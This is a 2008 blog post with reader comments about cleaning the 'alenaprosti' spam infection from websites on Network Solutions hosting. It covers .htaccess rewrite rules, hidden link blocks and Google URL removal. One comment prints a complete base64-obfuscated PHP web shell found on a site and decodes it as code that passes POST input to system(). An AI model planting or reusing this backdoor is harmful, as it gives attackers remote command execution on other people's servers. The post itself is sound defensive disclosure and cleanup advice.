Tuesday, July 22, 2008

Removing the alenaprosti worm From your Infected Files on Network Solution's Host

I suppose giving light on how one needs to clean their files of the infection is in order.

First, check your .htaccess for a rewrite rule directing requests of "alenaprosti" to a folder on your virtual host. Mine was a folder labeled "29". Delete this folder and all contents, and remove the rewrite rule from your .htaccess file.

Next, check all index.html[php][cgi][shtml][etc...] files for code matching the regular expression <ul style=\"display:none;\">.*</ul> and delete it from each file.

Now, do a Google site search for "alenaprosti" on your domain. For example, search the following: "alenaprosti site:mydomain.com". Using each of the entries, visit the Google Webmasters site at www.google.com/webmasters/ and submit URL removals for each of the results. It wouldn't hurt to add a disallow for "alenaprosti" in your robots.txt file, either.

This should work in most instances, but until Network Solutions fixes their security leak, be prepared to do it all over again in a month.


donald said...

any other information on this worm? I wondered what all of that crap was on my site.

James of all Trades said...

I sent out a mass email to about 75 of the affected clients last night, by looking up their WHOIS info.

Hopefully, this will spark an email explosion to Network Solution's support and get them to act on it.

Sly Devil said...

I am the webmaster of a site that is hosted on a netsol box and we have become infected with the worm as well. Not sure how it happened, but I have found several inconspicuous .php files sprinkled around the directory structure of the site. All .htaccess files were fine.

The body of these files are:
<?php $X=basename(__FILE__); $l="aWYoJF9QT1NUWyJsaW5rIl0peyRzdW09c3Vic3RyKCRfUE9TVFsibGluayJdLCBzdHJsZW4oJF9QT1NUWyJsaW5rIl0pLTQsc3RybGVuKCRfUE9TVFsibGluayJdKS0xKTsgaWYoJHN1bT0iMWpYIil7JGxpbms9YmFzZTY0X2RlY29kZShzdWJzdHIoJF9QT1NUWyJsaW5rIl0sIDAsIHN0cmxlbigkX1BPU1RbImxpbmsiXSktNCkpOyBAc3lzdGVtKCRsaW5rKTt9fQ=="; eval(base64_decode($l)); ?>

The long string of characters above is decoded into this:
if ( $_POST["link"] ) {
$sum = substr( $_POST["link"], strlen( $_POST["link"] ) - 4, strlen( $_POST["link"] ) - 1 );
if ( $sum = "1jX" ) {
$link = base64_decode( substr( $_POST["link"], 0, strlen( $_POST["link"] ) - 4 ) );
@system( $link );

And through the eval() function, this code virtually replaces what is in the original .php file and is then run. Essentially, the decoded code accepts text called "link" and decodes it. The code does a check to make sure it is valid and then it sends the "link" text to the system() function. The system() function will execute it on the server!! Very scary stuff!!! Whoever is in control of these .php files can do basically anything on the server.

Network Solutions really needs to get on top of this worm.

Anyway, have a look around for .php files and see what you come up with.